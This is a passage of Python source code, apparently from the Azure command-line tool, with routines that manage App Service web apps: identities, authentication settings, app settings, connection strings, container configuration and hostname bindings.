slot, api_version="2021-01-15")
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
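# A minimal sketch of the return value of the helper above, assuming MSI_LOCAL_ID is the '[system]'
# sentinel and one user-assigned identity resource id (both hypothetical here):
#   _build_identities_info(['[system]', '<identity-resource-id>'])
#   -> ({'type': 'SystemAssigned,UserAssigned', 'userAssignedIdentities': {'<identity-resource-id>': {}}},
#       'SystemAssigned,UserAssigned', ['<identity-resource-id>'], True)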
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
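# Examples of what the validator above accepts and rejects:
#   is_auth_runtime_version_valid('~2')    -> True   (tilde followed by an integer)
#   is_auth_runtime_version_valid('1.4.0') -> True   (exactly three dot-separated integers)
#   is_auth_runtime_version_valid('1.4')   -> False  (only two parts)
#   is_auth_runtime_version_valid('~x')    -> False  (non-integer after the tilde)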
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
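# Illustrative call (resource names are hypothetical): returns True only once the SCM site reports
# SCM_DO_BUILD_DURING_DEPLOYMENT=true and no WEBSITE_RUN_FROM_PACKAGE setting:
#   validate_app_settings_in_scm(cmd, 'myRG', 'myApp',
#                                should_contain={'SCM_DO_BUILD_DURING_DEPLOYMENT': 'true'},
#                                should_not_have=['WEBSITE_RUN_FROM_PACKAGE'])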
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
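# Kudu's /api/settings endpoint returns a flat JSON object; an illustrative (hypothetical) response:
#   {'SCM_DO_BUILD_DURING_DEPLOYMENT': 'true', 'WEBSITE_NODE_DEFAULT_VERSION': '~14'}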
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
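# Examples of the fx_version strings produced above (image names are hypothetical):
#   _format_fx_version('nginx')                        -> 'DOCKER|nginx'
#   _format_fx_version('docker|nginx')                 -> 'docker|nginx'  (prefix kept as-is)
#   _format_fx_version('<base64-config>', 'COMPOSE')   -> 'COMPOSE|<base64-config>'
#   _format_fx_version('https://myacr.azurecr.io/img') -> 'DOCKER|myacr.azurecr.io/img'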
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
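# Note that a scheme, a host and a non-empty path are all required above, so a hypothetical
# 'http://example.com' (no path) is rejected while 'http://example.com/compose.yml' passes.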
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # Base64-encode the raw config file bytes and return the result as a UTF-8 string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
    if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
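# Output shape of the helper above (names and values are hypothetical); masked credential settings
# come back with a None value:
#   [{'name': 'FOO', 'value': 'bar', 'slotSetting': False},
#    {'name': 'DOCKER_REGISTRY_SERVER_PASSWORD', 'value': None, 'slotSetting': True}]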
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must specify both --multicontainer-config-file FILE and '
                       '--multicontainer-config-type TYPE to update the multi-container configuration')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
